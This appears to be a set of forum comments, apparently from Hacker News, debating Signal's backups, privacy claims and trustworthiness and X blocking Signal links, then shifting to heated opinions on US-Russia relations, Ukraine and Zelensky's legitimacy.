Maybe you should? It might help improve your reading comprehension. The person you're responding to said that most normal people don't care enough to switch to a vastly less popular app, which is obviously true.
“Hey subjectsigma I got my new phone today. Where are all my messages?”
“… Do you have your old phone? That’s the only place they are.”
“No? Last time I got a new phone WhatsApp moved my messages over, and WA is E2EE so I thought it worked the same way.”
“Nope if you don’t have a backup or your old phone they’re gone. Sorry.”
“This is bullshit. Why does anyone use Signal. I can’t believe it deleted all my messages. I’m uninstalling it. Etc etc.”
We have a long way to go, my friend.
[1] There was a time when WhatsApp had a nag screen if you didn't have backup to Google activated. So I guess most people would have eventually caved.
Were you aware that Wire keeps a high-fidelity plaintext database of exactly who talks to who on their platform?
And people were reliably startled. But all that was happening was that ordinary users have no mental model for how a secure messenger is designed, and hadn't thought through how serverside contact lists that magically work no matter what device you enroll in the system were actually designed.
So here I'll just say: the stuff you're saying about Signal is pretty banal and uninteresting. The SGX+Enclave stuff is Signal's answer to something every other mainstream messenger does even worse than that. By all means, flunk them on their purity test!
Signal is advertised and recommended to some extremely vulnerable people whose lives/freedom depend on their security. Signal owes users a clear explanation of the risks that come from the use of their software so that whistleblowers, journalists, and activists can make informed choices. Lying to those users is disgusting.
Seen most charitably, the fact that the very first line of their privacy policy page is an outright lie might be intended as a dead canary to warn users away as loudly as they can, but even in that case I'll be happy to say it plainly: Signal shouldn't be trusted.
https://community.signalusers.org/t/proper-secure-value-secu...
https://web.archive.org/web/20210126201848mp_/https://palant...
https://www.vice.com/en/article/pkyzek/signal-new-pin-featur...
If, however, it is fucked up and on the brink of collapse, then sure, a little nudge can steer it in the "right" direction. But then who is guilty in the first place?
Also:
> Signal has been a primary method of communication for federal workers looking to blow the whistle on DOGE.
(from https://www.disruptionist.com/p/elon-musks-x-blocks-links-to...)
Btw, I don't live in the US but I sketched a simple tool to prevent X from censoring Signal.me links: https://link-in-a-box.vercel.app
Not surprising, considering Russian oligarchs enabled Musk's takeover of Twitter:
https://www.dw.com/en/what-do-xs-alleged-ties-to-russian-oli...
We have never done it with an ally this critical, of this size, with this level of investment. Yes, we have done it with smaller, less critical nations very often, and it is of course atrocious. In fact, Saddam, Bin Laden, and others were all originally our allies whom we betrayed.
But we never did it against an aggressive nuclear power invading Europe.
They were not allies, or not at all in the same sense. They were people the US did business with because of a common enemy, and then stopped doing business with when the situation changed. I don't think Saddam or Bin Laden thought for a moment that they were allies of the US, like Denmark and Japan are.
edit: I will not reply further. What I said would be true regardless of the economic policy or partisan identification of the administration.
> The sitting US President is literally a Russian asset. He is directing his team to divide up a country that Russia invaded in a summit that is not including that country, and stealing a half trillion in their sovereign mineral wealth without their consent. Calling their president an incompetent dictator and claiming being invaded was somehow their fault.
You can't be serious that you consider that to be a good enough reasoning.
Zelensky's support / approval rating is well over 50% (according to polls). Zelensky defeated Poroshenko, getting 73% of the vote in the 2019 election.
And yet he still felt the need to start politically repressing Poroshenko with sanctions and branding him a traitor; that's the mark of having a dictator in command of things.
The problem with this assertion is that Ukraine has "no elections under martial law" written into the law. Zelensky himself actually wanted to do some kind of election to reinforce his mandate while his support was still very high, but there was serious concern from the liberals about those plans on the basis that any election held under martial law, with large numbers of people mobilized to fight, 20% of the country occupied, and many millions of refugees unable to vote, would hardly be free and fair. Their pushback scuttled any plans for the parliament to amend said law.
Using the exact same reasoning, Churchill would be a dictator, too.
Also, in the Financial Times, the comment sections can be split 50/50.
By the way, the excessive use of the "Russian hacker" meme has been a source of amusement in the German hacker scene even before 2022.
Also, of course, Germany and WW2 are mentioned constantly in Russia itself even today, while most new wars in the past 40 years have been started by the US or Russia.